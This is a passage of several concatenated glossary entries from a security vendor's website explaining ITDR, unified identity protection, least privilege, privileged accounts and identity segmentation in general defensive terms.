signals should be processed and analyzed in real time as the access attempt is initiated, but some ITDR solutions analyze their logs retroactively. The more data ITDR solutions can analyze, the more accurately they can detect sophisticated threats. However, they must also ensure privacy, data security, and compliance with regulations like GDPR.   ITDR is a critical component of a strong cybersecurity architecture. ITDR helps organizations establish a robust resilience against lateral movement, account takeover, and ransomware spread, eliminating a critical portion of today’s enterprise’s cyber risks. Why Is ITDR Important? There are several reasons why ITDR has become such a crucial component of cybersecurity: Identities are the new perimeter. As companies move to cloud and hybrid environments, the traditional network perimeter has dissolved. User and device identities are the new perimeter, and they must be protected. Moreover, user identities are a historic blind spot threat actors increasingly abuse when attacking the on-prem environment. Credentials are the easiest security measure to compromise. Phishing and social engineering are prevalent. Phishing emails and social engineering tactics are commonly used to steal user credentials and access systems. ITDR solutions analyze user behavior to detect credential theft and suspicious activity. Compliance requirements demand it. Regulations like GDPR, HIPAA, and PCI DSS mandate that companies protect personal data and monitor for identity compromise events and data breaches. ITDR solutions address these compliance requirements. Attackers target accounts and credentials. Stolen usernames, passwords, and compromised accounts are frequently used to infiltrate networks and systems. ITDR detects when accounts and credentials have been stolen or misused to enable a quick response. How ITDR Works When an ITDR system detects suspicious activity, it triggers an automated response to contain the threat before sensitive data can be accessed or stolen. Common responses include: Generating an alert on suspicious activity.   Requiring multi-factor authentication for account access Blocking access from unrecognized devices or locations Effective ITDR requires aggregating and analyzing identity and account data from across an organization. This includes: User Access Data Details about which accounts have access to which systems and resources. Monitoring for unusual access patterns can reveal account takeovers or privilege escalation attacks. Behavioral Profiles Historical patterns of user login times, locations, devices used and other behaviors. Deviations from established profiles may indicate an account compromise. Threat Intelligence Information about active cyber threats, attack techniques and indicators of compromise. ITDR solutions can match behavioral anomalies and suspicious events against known threats to identify targeted attacks. Relationship Mapping Connections between users, accounts and systems. Detecting lateral movement between unrelated accounts or resources may uncover an active intrusion. By continuously monitoring this data and acting quickly when threats are detected, ITDR helps reduce the risk of identity-based breaches that could expose sensitive customer data, intellectual property or other critical digital assets. With cybercriminals increasingly focused on identity as an attack vector, ITDR has become an important component of cyber defense in depth for many organizations. The Core Components of an ITDR Solution An effective ITDR solution relies on four core components working together: Continuous Monitoring Continuous monitoring constantly scrutinizes networks, systems, and user accounts for anomalies that could indicate identity threats. It helps detect threats early through ongoing analysis of logs, events, and other data. Continuous monitoring solutions use machine learning and behavioral analytics to establish a baseline of normal activity and spot deviations that could signal an attack targeting identity systems. Identity Governance Identity governance aims to manage digital identities and access privileges. It ensures that user access is appropriate and compliant with security policies. Identity governance solutions automate user provisioning and deprovisioning, enforce access policies, and monitor for policy violations. They provide a centralized way to control access across an organization’s systems and applications. Threat Intelligence Threat intelligence informs an organization about the motives, methods, and tools of threat actors targeting networks and accounts. ITDR solutions incorporate threat intelligence to help security teams anticipate new types of identity attacks. Armed with knowledge about emerging threats, organizations can better detect and respond to sophisticated identity compromises. Incident Response When identity threats are detected, an automated incident response capability can help minimize damage. ITDR solutions trigger pre-defined response actions like disabling compromised accounts, isolating impacted systems, or resetting passwords. They also alert security teams about the incident and provide information to aid in further investigation and remediation. An ITDR solution with all four of these components helps organizations take a proactive stance against identity threats through ongoing monitoring and governance, gain insight into emerging attack techniques from threat intelligence, and respond quickly when incidents do occur. With comprehensive visibility and control across digital identities and access, organizations can reduce risks to accounts, networks, systems, applications, and data. Implementing ITDR in Your Organization Implementing an ITDR solution requires strategic planning and execution. To successfully deploy ITDR in an organization, several key steps should be followed: First, assess the organization's security vulnerabilities and risks. This includes identifying critical systems, applications, and data assets that require monitoring and protection. It also involves evaluating existing security controls and procedures to determine any gaps that could be addressed by an ITDR solution. Next, determine ITDR requirements and scope. The organization needs to decide which threats and risks the solution should address, such as unauthorized access, data breaches, account takeover, etc. They also must determine which systems, applications, and accounts will be monitored by the ITDR solution. With requirements defined, the organization can evaluate different ITDR solutions from vendors that meet their needs. They should assess factors like the types of identity threats detected, ease of deployment and use, integration with existing security tools, and cost. After comparing options, they choose a solution that best fits their requirements. The selected ITDR solution is deployed, configured, and integrated with the organization's infrastructure and security stack. User access and permissions are set up, policies around alerting and response are established, and administrators are properly trained to operate the solution. After deployment, the ITDR solution must be continuously monitored to ensure it is functioning properly and providing maximum value. Policies and configurations should be tuned over time based on lessons learned. The solution itself may also need upgrading to address new identity threats. Ongoing education and practice help build the team's skills in detecting and responding to identity threats. With vigilant management and the right solution in place, an organization can strengthen their security posture against damaging identity threats. ITDR, when implemented well, gives companies a robust mechanism for discovering and mitigating identity compromises before they cause harm. Best Practices for ITDR Best practices for ITDR include identifying key vulnerabilities, monitoring for threats, and having a response plan in place. To identify identity security gaps , organizations should conduct regular risk assessments and penetration testing. Risk assessments evaluate infrastructure, applications, and user access controls to find weaknesses that could be leveraged for attack. Penetration testing simulates real-world attacks to uncover vulnerabilities. Identifying vulnerabilities is an ongoing process as new threats emerge and environments change. Continuous monitoring is also critical. This includes monitoring user accounts for anomalous login activity, watching network traffic for signs of brute force attacks or data exfiltration, and log analysis to detect compromises after the fact. Security teams should establish key risk indicators and monitor them regularly. Having an incident response plan prepares organizations to act quickly in the event of a compromise. The plan should designate key roles and responsibilities, communication protocols, and procedures for containing threats and restoring systems. Plans need to be tested through simulations to ensure effectiveness. Teams should also have access to threat intelligence to stay up-to-date on adversary tactics, techniques, and procedures. Other best practices include: Multi-factor authentication to verify user identities Least privilege access policies to limit user permissions Regular phishing simulations and security awareness training for employees Centralized logging and security information and event management (SIEM) to correlate data Backup and recovery strategies in case of ransomware or other destructive attacks Assume identities are an attack surface. Following these best practices helps organizations take a proactive stance on security. Detecting threats early and having a tested plan for response can help minimize damage from attacks and reduce recovery time. Continuous improvement is key to staying ahead of sophisticated adversaries. With technology and techniques constantly evolving, ITDR must be an ongoing priority. Key ITDR Challenges and How to Overcome Them ITDR solutions face several key challenges that organizations must overcome to be effective. Identities are not treated as an attack surface The identity attack surface is the least protected in the IT environment today because, unlike malware, exploits or phishing attacks, a malicious access with compromised credentials is identical to a legitimate one, making it extremely hard to identify and block. Lack of visibility ITDR tools rely on data to detect threats, but many organizations lack visibility into user and entity behavior. Without access to authentication logs, network activity, and other data sources, ITDR solutions have limited ability to spot anomalies. Organizations must implement comprehensive logging and monitoring to provide the data ITDR needs. Too many false positives ITDR systems that generate too many false positives overwhelm security teams and reduce trust in the system. Organizations must tune ITDR systems to their environment by customizing detection rules, configuring thresholds for alerts, and filtering out known false positives. They can also use machine learning to help the system adapt to their network’s normal behavior. Strong ITDR solutions incorporate MFA as an additional verification laye, prior to alerting or blocking access. This is the most effective method to filter noise and ensure that only actual threats trigger a response. Lack of context ITDR alerts provide information about a suspicious event but often lack context around the event. Organizations need to gather additional context, such as details about the user, device, and network involved, as well as activity leading up to and following the suspicious event. Context helps analysts determine if an alert is a true positive or not. Skill and resource shortage Effective ITDR requires skilled security analysts to review, investigate and respond to alerts. However, the cybersecurity skills shortage means many organizations lack enough analysts. Organizations should consider outsourcing ITDR to a managed security services provider or using security orchestration, automation and response (SOAR) tools to help streamline the review and response process. Poor response planning Even with effective detection, organizations must have a well-defined response plan to properly react to and contain threats. Organizations need to determine responses for different types of threats, create runbooks for common scenarios, assign roles and responsibilities, and establish metrics to measure response effectiveness. Planning and practice can help organizations minimize the damage from identity threats. The Future of ITDR: What's Next? The field of ITDR is constantly... --- - Published: 2023-12-11 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/unified-identity-protection/ A consolidated security approach that provides centralized visibility and automated safeguards across all identity types—human and machine—to detect and respond to threats universally. Unified Identity Protection refers to a holistic approach that provides comprehensive safeguards for an organization's digital identities and access. Unified Identity Protection Platforms consolidate identity and access management, multi-factor authentication, privileged access management, and more, into a single cohesive solution that addresses the wide range of identity threats. By coordinating these functions, it aims to eliminate security gaps, reduce risks, and streamline operations. For cybersecurity professionals, understanding Unified Identity Protection and how to implement it effectively has become essential knowledge. Unified Identity Protection: An Overview Unified Identity Protection provides centralized visibility and control over all user and service account access across an organization’s entire IT environment. It integrates with the identity and access management controls for on-premise and cloud-based corporate resources to provide an infrastructure-agnostic security layer. Unified Identity Protection solutions offer a holistic approach to managing identities and access. They provide continuous monitoring of user and service account activity across all connected systems. Advanced analytics powered by machine learning detect anomalous behavior and risk in real time. Adaptive authentication and access policies are then enforced based on the level of risk. Comprehensive Coverage Unified Identity Protection solutions integrate with all major identity and access management systems as well as infrastructure, cloud services, and business applications. This provides coverage for all connected assets across on-premise, hybrid, and cloud environments. Resources that were previously unprotected, such as legacy systems, file storage, and command-line tools are now secured. Centralized Visibility and Control A unified platform gives IT teams a centralized view of all access and activity across the organization. Comprehensive reports provide insights into risk exposure, compliance gaps, and opportunities for streamlining access. Granular controls allow administrators to manage access, enable single sign-on, and enforce multi-factor authentication based on conditional factors like user role, access method, and risk level. Advanced Threat Protection Powerful analytics, machine learning, and behavioral profiling work together to detect anomalous access, credential sharing, privilege escalation, and insider threats. Adaptive responses ranging from step-up authentication to blocking access are automatically triggered based on the risk severity. This protects critical resources from compromise and data breaches. . How Unified Identity Protection Works Unified Identity Protection (UIP) provides continuous monitoring and adaptive control of user access across an organization's hybrid IT environment. UIP solutions integrate with existing identity and access management (IAM) systems to gain a comprehensive view of accounts, entitlements, and access events. UIP leverages machine learning and behavioral analytics to detect anomalous access patterns in real time. Risk-based policies are then applied to step-up authentication or block suspicious access attempts. For example, if a user account suddenly accesses a high-value resource it has never accessed before, UIP can require additional verification like multi-factor authentication (MFA) before granting access. How UIP Works UIP solutions typically comprise three main components: Connectors that integrate with on-prem and hybrid IAM systems, PAM, VPN, and any other component that processes credentials for user access to gain visibility into accounts, authentication events, and resource access. These provide continuous unified monitoring of all authentication requests that spans both user-to-machine and machine-to-machine access across all resources and environments. This includes attempts to access cloud workloads, SaaS applications, on-premises servers and workstations, local business applications, file shares and any other resource. A risk engine that uses machine learning and behavioral profiling to detect anomalies and calculate a risk score for each access request. The risk engine considers factors like time of day, location, device, resource sensitivity, and more, to provide real-time risk analysis of each and every authentication attempt to detect and respond to threats. Analyzing the full context of an authentication request requires visibility into the behavior on all networks, clouds or on-prem resources. An active enforcement layer that takes action based on risk score and\or configured policy rules . Actions may include prompting for additional authentication factors, notifying administrators, restricting access, blocking the request altogether or the enforcement of adaptive authentication and access policies on all access attempts. This involves extending security controls like MFA, risk-based authentication and conditional access to all enterprise resources. UIP provides a consolidated view of risk across an organization's hybrid IT environment. With comprehensive visibility and unified controls in place, businesses can reduce the risk of data breaches, streamline compliance processes, and enable a seamless transition to cloud-based infrastructure. UIP delivers a proactive approach to identity and access security in today's enterprise. Key Capabilities of Unified Identity Protection Platforms An Unified Identity Protection Platform offers several key capabilities: Centralized Management Unified identity protection solutions provide a single management console to configure and monitor identity protection policies across an organization. This centralized approach reduces administrative overhead and ensures consistent policy enforcement across on-premises and cloud environments. Risk-Based Authentication Unified identity protection solutions implement risk-based authentication which evaluates the risk level of a login attempt and applies adaptive authentication controls accordingly. For example, if a login is detected from an unknown device or location, the solution may prompt for additional authentication factors like one-time passwords. This helps prevent unauthorized access while minimizing friction for legitimate users. Anomaly Detection Unified identity protection solutions use machine learning to establish a baseline of normal user behavior and detect anomalous activity that could indicate account compromise or insider threats. Solutions monitor attributes like login locations, devices, timings as well as activity within applications to spot unusual behavior. When anomalous activity is detected, the solution can trigger risk-based authentication or block access. User and Entity Behavior Analytics Unified identity protection solutions provide user and entity behavior analytics which apply machine learning to detect complex behavioral patterns across large volumes of identity data that may indicate threats. Solutions can detect threats like stolen credential usage, privilege escalation, and data exfiltration that would otherwise go unnoticed. Analytics results are presented with contextual information to help security analysts investigate and respond to potential threats. In summary, unified identity protection solutions deliver a robust set of capabilities including centralized management, risk-based authentication, anomaly detection, and advanced user behavior analytics. These capabilities work together to provide comprehensive protection for identities and sensitive resources across IT environments. Why Unified Identity Protection Matters Unified Identity Protection is essential for organizations today. As companies adopt cloud services and remote work becomes more common, traditional perimeter security is no longer sufficient. Unified Identity Protection provides continuous authentication and access control across all corporate resources, regardless of location. Comprehensive Coverage Unified Identity Protection monitors all access by users and service accounts across cloud and on-premise environments. It analyzes access of privileged accounts, endpoints, applications, networks, and files to provide a single pane of glass into identity and access activity. This consolidated view allows security teams to gain visibility into risks that span the entire IT infrastructure. Real-Time Analytics Unified Identity Protection uses machine learning and behavioral analysis to detect anomalies in real time. The solution analyzes vast amounts of data to establish a baseline of normal activity for each user and resource. It then flags unusual access attempts, excessive permissions, and other potential threats. Security teams receive alerts about risky events as they happen, enabling rapid response. Proactive Control Based on analytics, Unified Identity Protection enforces adaptive authentication and granular access policies. It may require step-up authentication for risky access, or it could block access altogether. Policies are tailored to the sensitivity of resources and the risk profile of users. Controls also evolve as the solution learns more about typical behavior patterns in the organization. Simplified Compliance Unified Identity Protection generates comprehensive reports to demonstrate compliance with regulations like PCI DSS, HIPAA, GDPR, and others. The solution provides an audit trail of all access activity, permissions, and policy enforcements across the IT environment. This level of visibility and control helps organizations comply with identity and access management requirements and pass audits with less effort. In summary, Unified Identity Protection delivers defense in depth for identities and access. It is a must-have capability for securing corporate resources and sensitive data in today's expanding threat landscape. By consolidating identity security controls across on-premise and cloud infrastructure, Unified Identity Protection enables a cohesive, data-driven approach to access governance and risk mitigation. The Future of Unified Identity Protection Unified Identity Protection platforms are evolving rapidly to keep up with the increasing sophistication of cyber threats. As more organizations adopt cloud services and enable remote workforces, the need for comprehensive yet streamlined security is paramount. Expanding Coverage UIP solutions will continue expanding their coverage to more assets and access types. They will integrate with more IAM, infrastructure, and cloud platforms to provide end-to-end visibility and control across increasingly complex IT ecosystems. UIP systems will monitor access to emerging technologies like serverless functions, Kubernetes, and microservices. They will also track the proliferating types of identities, including service accounts, machine identities, and ephemeral access keys. Applying Advanced Analytics Artificial intelligence and machine learning will enable UIP platforms to become smarter and more responsive. They will detect anomalies, spot suspicious behavior patterns, and identify risky access in real time. Analytics will power adaptive policies that adjust automatically based on context like user attributes, resource sensitivity, and threat levels. Risk-based authentication will leverage biometrics, behavior profiling, and risk signals to apply the appropriate authentication method for each access request. Orchestrating Integrated Workflows UIP solutions will integrate more tightly with other security tools like SIEMs, firewalls, and XDRs. They will participate in coordinated incident response workflows by sharing identity context and access data. UIP platforms will also trigger automated responses by interfacing with tools like identity governance, privileged access management, and network security. These integrated, automated workflows will accelerate detection, investigation, and remediation of threats involving compromised or misused identities. The future of Unified Identity Protection is one of expanded scope, enhanced intelligence, and integrated functionality. UIP solutions that can provide comprehensive, risk-aware coverage, tap advanced analytics, and orchestrate with other security controls will be best positioned to help organizations navigate the challenges of the hybrid cloud era. By consolidating identity security, UIP reduces complexity while improving protection, compliance, and operational efficiency. Conclusion It's clear that Unified Identity Protection offers a comprehensive solution to securing user identities across an organization. By taking a holistic approach instead of relying on disparate identity and access management solutions, organizations can gain better visibility and control. They can also reduce risk by eliminating identity silos and ensuring consistent policy enforcement. With the rise of cloud services, mobility, and digital transformation, identity has become the new security perimeter. Unified Identity Protection helps ensure that perimeter is properly defended through an integrated system that provides a single source of truth for user identities. For cybersecurity leaders looking to strengthen their identity and access management posture, Unified Identity Protection deserves strong consideration. --- - Published: 2023-11-30 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/principle-of-least-privilege/ A security principle where users and systems are granted only the minimal access levels necessary to perform their functions, limiting potential misuse or compromise. The principle of least privilege is based on restricting user access to only the resources and permissions necessary to fulfill their responsibilities. Users are only granted the minimum access rights and permissions required to complete their work and nothing more. By restricting unnecessary access, the principle of least privilege (also called the principle of minimal privilege) helps reduce an organization's attack surface. With fewer access points and privileges available to potential threat actors, the likelihood of a successful cyberattack decreases. Following this principle also limits the possible damage from an attack by restricting what resources can be accessed. Why Is Least Privilege Important for Cybersecurity? Following the principle of least privilege (POLP) enhances security by reducing the number of potential attack vectors. When users have excessive permissions, their accounts become more valuable targets for threat actors seeking to infiltrate and gain access to systems and critical resources . By limiting user privileges to only what is required for their role, organizations decrease the likelihood of compromise and limit potential damage. If a user account with unnecessary admin access is compromised, the attacker would gain those admin rights and have unauthorized access to sensitive data, install malware, and make major system changes. By applying the least privilege, admin accounts are only provided to select individuals, and standard user accounts have limited permissions, reducing the impact of privileged account takeovers. Overall, the principle of least privilege supports the "need to know" model, where users only have access to the minimum amount of data and resources required to do their jobs. This approach strengthens security and compliance for any organization. How the Principle of Least Privilege Works To implement the least privilege principle, system administrators carefully control access to resources and limit users’ permissions. Some examples include: Restricting user access to specific systems, files, folders, and storage areas. Users can only access the files and folders needed for their role. Assigning limited user permissions and access rights to applications, databases, critical systems, and APIs. Users are only granted the minimum permissions required to fulfill their responsibilities. Provisioning role-based access control (RBAC) to limit users to specific job functions. RBAC assigns users to roles based on their responsibilities and grants permissions based on those roles. Regularly reviewing and auditing user access rights to ensure they are still appropriate and making changes as needed. Permissions that are no longer required are promptly revoked, thus avoiding identity sprawl and privilege creep. Enforcing the separation of duties by dividing complex tasks among multiple users. No single user has end-to-end control or the permissions to abuse the process. By following the principle of least privilege, organizations can limit the potential damage from insider threats, account takeovers, and compromised privileged credentials. It also promotes accountability by making it clear which users have access to what resources. Overall, the principle of least privilege is a foundational best practice for cybersecurity risk management. Least Privilege & Zero Trust POLP works in tandem with the zero trust model, which assumes that any user, device, or network could be compromised. By limiting access and privileges, zero trust architectures can help contain breaches when they occur. The principle of least privilege is considered a best practice for cybersecurity and is required for compliance with regulations like HIPAA, PCI DSS, and GDPR. Proper implementation of POLP can help reduce risk, limit the impact of data breaches, and support a strong security posture. Common Challenges of Enforcing Least Privilege Enforcing the principle of least privilege can present several challenges for organizations. One common challenge is determining appropriate access levels for different roles. It requires carefully analyzing what access is truly needed for employees to perform their jobs. If access is too restrictive, it can hamper productivity. If too permissive, it increases risk. Striking the right balance requires understanding both technical and business needs. Another challenge is implementing the least privilege in legacy systems and applications. Some older technologies were not designed with granular access control in mind and may require upgrades or replacements to properly support them. This can be resource-intensive, requiring investments of time, money, and staff. However, the risks of not modernizing outdated infrastructure that cannot adequately enforce least privilege likely outweigh these costs. User provisioning and de-provisioning also present hurdles. When employees join, are promoted, or leave an organization, their access rights must be properly assigned, modified, or revoked. Without automated provisioning processes, this is prone to human error. Accounts may be misconfigured or not disabled promptly when no longer needed. Automation and strong provisioning policies are key to overcoming this challenge. Finally, compliance with least privilege requires ongoing monitoring and review. Static access assignments will become outdated as technology, infrastructure, and business needs change. Regular audits are necessary to identify and remediate excessive or unnecessary access. This demands resources to perform reviews, manage exceptions, and make required changes to support continuous enforcement of least privilege. With time and practice, organizations can develop streamlined processes to ease these compliance challenges. In summary, while least privilege is an essential best practice, implementing and sustaining it requires substantial and ongoing effort. However, the risks of failing to do so necessitate that organizations invest the resources to overcome these common challenges. With the proper technology, policies, and procedures in place, the principle of least privilege can be effectively enforced to maximize security. Implementing Least Privilege Access Controls Implementing the principle of least privilege requires determining the minimum level of access users need to do their jobs and limiting access to that level. This is done through account management, access control policies, and identity and access management solutions. Privileges are assigned based on users’ roles and responsibilities, with administrative access granted only when necessary. Regular reviews of account privileges and access logs also help ensure compliance with the principle of least privilege. To implement least privilege access controls, organizations should: Conduct a data access review to identify who has access to what data and resources. This review will uncover unnecessary or excessive access privileges that should be revoked. Establish role-based access control (RBAC) policies that assign access privileges based on job roles and responsibilities. RBAC ensures that users only have access to the data and resources they need for their specific job function. Use the concept of "need to know" to grant access only when there is a legitimate need. Need to know limits access to sensitive data and resources to only authorized individuals. Implement access control mechanisms like multifactor authentication, identity and access management (IAM) tools, and privileged access management (PAM) solutions. These mechanisms and tools provide greater control and visibility over who has access to what. Continuously monitor access and make changes as needed. Regular access reviews and audits should be conducted to ensure policies and controls align with the principle of least privilege. Excessive access should be revoked immediately. Provide access on a temporary basis when possible. Temporary access privileges should be granted only for as long as needed to complete an authorized activity or task. Permanent access should be avoided when temporary access can meet the need. Conclusion As organizations work to strengthen their cyber defenses, implementing the principle of least privilege should be a top priority. By restricting user access to only the resources and data required to perform a job, risks are reduced significantly. While it requires time and effort to configure systems and accounts properly, the long-term benefits to security posture and risk management are well worth it. Adopting a “zero trust” approach and verifying each request as though coming from an untrusted network is the direction many experts recommend. The principle of least privilege is a foundational best practice that all cybersecurity programs should embrace to build resilience and reduce vulnerabilities. Strictly enforcing access controls and continuously auditing them is the responsible and prudent thing to do. --- - Published: 2023-11-30 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/privileged-account/ An account with elevated permissions (such as administrator or root access) that allows extensive control over systems and data—making it a high-value target for attackers. Privileged accounts are user accounts that have elevated access privileges to an organization's systems and data. They include accounts like administrators, root, and service accounts. These accounts are highly sought after by attackers because compromising them provides broad access to the data and systems of privileged users. Administrative accounts, or admin accounts, are user accounts with full administrative privileges to make changes to a system. They can install software, change system configurations, create or delete user accounts, and access sensitive data. Root accounts, common in Linux and Unix systems, have unlimited privileges. Service accounts are tied to specific applications and services, allowing them to start, stop, configure, and update services. Because of their powerful capabilities, privileged accounts are considered a major security risk and require strong safeguards. If misused or compromised, they can inflict major damage. Proper management of privileged accounts is a crucial part of an organization’s cyber securitystrategy. By implementing controls and monitoring these powerful accounts, you can reduce the risk of them being compromised and used to compromise your network. Failing to properly manage privileged access is like leaving your doors unlocked—sooner or later, someone will get in. With dangerous cyber threats on the rise, privileged account security should be a top priority. Types of Privileged Accounts There are several types of privileged accounts that provide elevated access to systems and data. Understanding the differences between these account types is crucial for managing privileges and mitigating risks. Domain Admins have full control over Active Directory and other directories and can access resources across an entire domain. These highly privileged accounts should be carefully monitored and secured. Local Admins have elevated privilege rights on a single system or device. While their privileges are limited to that system, compromised local admin accounts can still enable an attacker to access sensitive data or install malware. Local admin access should be restricted whenever possible through the principle of least privilege. Service Accounts are used by applications and services to access resources. These accounts typically have more privileges than a standard user and are often overlooked in privilege management programs. Service accounts should be audited regularly to ensure privileges are appropriate and accounts are properly secured. Root accounts, also known as superusers, have unlimited privileges in Unix and Linux systems. Root access enables a user to fully control the system and should be strictly controlled. Users should only access the root account when necessary to perform administrative tasks. Emergency Access Accounts, like firecall accounts, provide a last line of access in the event of an outage or disaster. These highly privileged accounts need to be secured and monitored closely due to the significant damage that could result from unauthorized use. Access should be granted only when an emergency situation arises. Privileged accounts that are not properly managed pose a serious risk to organizations. Implementing least privilege and privilege separation, monitoring account activity, and requiring multi-factor authentication are crucial controls for securing privileged access. With vigilance and the right strategy, privileged accounts can be safely governed to support business operations. The Risks of Unmanaged Privileged Accounts Privileged accounts provide administrative access to critical systems and data, so they pose substantial risks if not properly managed. Unmanaged privileged accounts can lead to data breaches, cyber-attacks, and loss of sensitive information. According to research, 80% of data breaches involve privileged account compromise. Privileged accounts like system administrators have unrestricted access to networks, servers, and databases. If compromised, they give attackers free rein to steal data, install malware, and wreak havoc. Attackers often target privileged accounts through phishing emails with malicious attachments or links. Once an attacker gains access to a privileged account, they can move laterally within the network to find valuable data and cover their tracks. It can take organizations months or even years to detect a breach involving privileged account compromise. Unmanaged privileged accounts also pose risks from within. Overly permissive access rights and a lack of control over privileged accounts enable malicious insiders to abuse their access for personal gain. Insider threats are difficult to detect since insiders have legitimate access to systems and their behavior may not seem suspicious. To reduce risks from privileged accounts, organizations must implement privileged access management (PAM) controls and continuously monitor privileged account activity. PAM controls like multi-factor authentication (MFA), least privilege, and privileged session monitoring help organizations strengthen security, gain visibility, and facilitate compliance. MFA adds an extra layer of security for privileged account logins. It requires not only a password but also a security token or biometric scan to log in. MFA protects against phishing attempts, brute force attacks, and unauthorized access. The principle of least privilege limits privileged account access rights to only what is needed to perform job functions. It reduces the attack surface and limits the damage from compromised accounts or malicious insiders. Privileged roles and access are granted only for specific, limited purposes and time periods before expiring. Privileged session monitoring records and audits privileged account activity to provide accountability and detect suspicious behavior. Monitoring can detect threats in real time and provide forensic evidence for investigations. Organizations should log and monitor all commands, keystrokes, and activity for privileged accounts. To summarize, unmanaged privileged accounts pose major cybersecurity risks that can have devastating consequences. Implementing controls like MFA, least privilege, and monitoring is critical for managing privileged account risks. With strong PAM practices in place, organizations can gain visibility and control over their privileged accounts, reducing vulnerabilities and strengthening their security posture. Best Practices for Securing Privileged Accounts Securing privileged accounts is crucial for any organization. These accounts, like administrator, root, and service accounts, have elevated access and permissions, so protecting them should be a top priority. Failure to properly manage privileged accounts can have devastating consequences. Least Privilege Access The principle of least privilege means only granting users the minimum level of access needed to perform their jobs. For privileged accounts, this means only assigning elevated rights when absolutely necessary, and for limited periods of time. When admin access is no longer needed, permissions should be promptly revoked. This limits opportunities for accounts to be compromised and abused. Multi-Factor Authentication Multi-factor authentication (MFA) adds an extra layer of security for privileged accounts. It requires not only a password, but also another method of authentication like a security key, code sent to a mobile device, or biometric scan. MFA helps prevent unauthorized access even if a password is stolen. It should be enabled for all privileged accounts whenever possible. Separate Accounts Personal and privileged accounts should be separate. The same account should never be used for both normal and elevated access needs. Separate accounts allow for more granular permission assignment and auditing. Personal Internet usage and activities should also be kept completely separate from privileged accounts used for administrative tasks. Monitoring and Auditing All privileged account activity should be closely monitored to detect misuse or compromise as quickly as possible. Enable logging for all privileged accounts and review logs regularly. Monitor for anomalies like logins from unknown devices or locations, access during unusual hours, changes to security settings, or other suspicious behaviors. Audits provide visibility into how privileged accounts are being accessed and used over time. Change Default Passwords Default passwords for privileged accounts provide easy access for attackers and should be changed immediately. Require strong, unique passwords for all privileged accounts that follow standard complexity guidelines. Passwords should be routinely rotated, at least every 90 days. Reusing the same password for multiple privileged accounts should never be allowed. Restrict Remote Access Remote access to privileged accounts should be avoided when possible and heavily restricted when necessary. Require MFA for any remote logins and monitor them closely. Disable remote access completely for highly sensitive privileged accounts. On-premises access with a physical workstation is ideal for the most privileged accounts. By following security best practices for privileged accounts, organizations can significantly reduce risks from compromised credentials and insider threats. Proper management and protection of privileged access is well worth the investment. Solutions for Privileged Access Management Privileged access management (PAM) solutions aim to control and monitor privileged accounts. These specialized accounts have elevated permissions that provide administrative access, allowing users to make changes that impact systems and data. Access Control PAM solutions implement access control policies that grant privileged access only when needed according to the principle of least privilege. This may involve restricting which users can access which privileged accounts and what those accounts can access. Solutions may use tools like password vaults, multi-factor authentication, and password rotation to secure privileged accounts when not in use. Session Monitoring PAM solutions monitor privileged sessions in real time to gain visibility into administrator activity. This deters malicious behavior and helps identify policy violations or areas where education is needed. Monitoring may capture details like keystrokes, screenshots, and session recordings. Analysts can then review these session details to detect anomalies and ensure compliance with security best practices. Threat Detection Some PAM solutions incorporate user behavior analytics and machine learning to detect threats targeting privileged accounts. By analyzing details from monitoring privileged sessions and access requests, the solutions can identify suspicious activity that may indicate account compromise or data exfiltration. They may detect threats like brute force attacks, privilege escalation, and lateral movement between systems. Workflow Automation PAM solutions can automate components of privileged access management to improve efficiency and scalability. They may automate processes such as access request approvals, password changes, and account reviews. Automation reduces the burden on IT staff and helps ensure consistent enforcement of security policies. Reporting and Alerting Effective PAM depends on understanding how privileged accounts are being used. PAM solutions provide reporting and alerting capabilities that offer visibility into privileged account activity. Reports may show details like who has accessed which accounts, policy violations, and threats detected. Alerts notify administrators of any urgent issues that require immediate action like account compromise or data theft. In summary, privileged access management solutions help organizations gain control over their privileged accounts through access control, monitoring, threat detection, automation, and reporting. Implementing a PAM solution is a key step organizations can take to improve their cybersecurity posture and reduce risk. Conclusion As cyber threats become increasingly sophisticated, ensuring proper access control and monitoring of privileged accounts is critical for any organization. Privileged accounts, like administrator, root, and service accounts, have extended access and permissions within IT systems and networks. If compromised, they can be used to gain broad access to sensitive data and resources. However, they are necessary for the routine management and maintenance of infrastructure and services. This article provides an overview of privileged accounts, why they are targets for cybercriminals, best practices for securing them, and strategies for monitoring them to detect potential misuse or compromise. For cybersecurity professionals and IT managers, understanding privileged accounts and how to properly manage the risks associated with them is fundamental to building a robust security posture. --- - Published: 2023-11-06 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/identity-segmentation/ A cybersecurity strategy that isolates users into groups based on roles, attributes, or behavior in order to enforce least‑privilege access and minimize lateral movement risks. Identity segmentation is a cyber security model that isolates users based on their job functions and business requirements. An organization can implement tighter controls and monitor over sensitive data and system resources by segmenting user access strategically. For cybersecurity professionals, understanding identity segmentation concepts and best practices is crucial to reducing risk and protecting an organization's digital assets. When implemented correctly, identity segmentation reduces the likelihood of data compromise due to compromised credentials or insider threats by restricting lateral movement across the network. It allows security teams to enforce the principle of least privilege and "need to know" access for users and services. Identity segmentation requires carefully analyzing user behavior and their interactions with different systems and resources to determine appropriate groupings and access levels. While complex to implement, identity segmentation is one of the most effective strategies for limiting the attack surface and hardening defenses. For any organization, identity is the new perimeter - and segmentation is key to controlling access and increasing overall identity security. The core components of identity segmentation include: Attribute analysis: Examining attributes like job role, location, and access permissions to group similar identities. For example, executives can be segmented from contractors. Behavioral analysis: Analyzing behavior patterns like login times, resource access, and network activity to group identities with comparable behaviors. Unusual behaviors within a segment may point to compromised accounts or insider threats. Risk assessment: Determining the level of risk for each identity segment based on attributes, behaviors, and security policies. Higher-risk segments require stronger controls and monitoring. Policy enforcement: Implementing customized access controls, authentication requirements, auditing, and other security policies for each segment based on their risk assessment. Policies are adjusted as risks change. The Benefits of Implementing Identity Segmentation Identity segmentation, also known as identity-based segmentation, enhances security by controlling access to resources based on user attributes. It aligns permissions with business needs, reducing an organization's attack surface. Granular Control Identity segmentation provides granular control over user access. Rather than assigning broad permissions based on a user's role, access is granted based on attributes like department, location, and job function. This minimizes excessive privileges and limits the damage from compromised accounts. Streamlined Compliance By aligning access with business needs, identity segmentation simplifies compliance with regulations like GDPR, HIPAA, and PCI DSS. Audits are more efficient since permissions map directly to organizational policies. Support for Hybrid Environments In today's multi-cloud and hybrid IT environments, identity segmentation is crucial. It provides a consistent way to manage access across on-premises and cloud-based resources. The same attributes and policies are applied regardless of where applications and workloads reside. Improved Reporting Identity segmentation 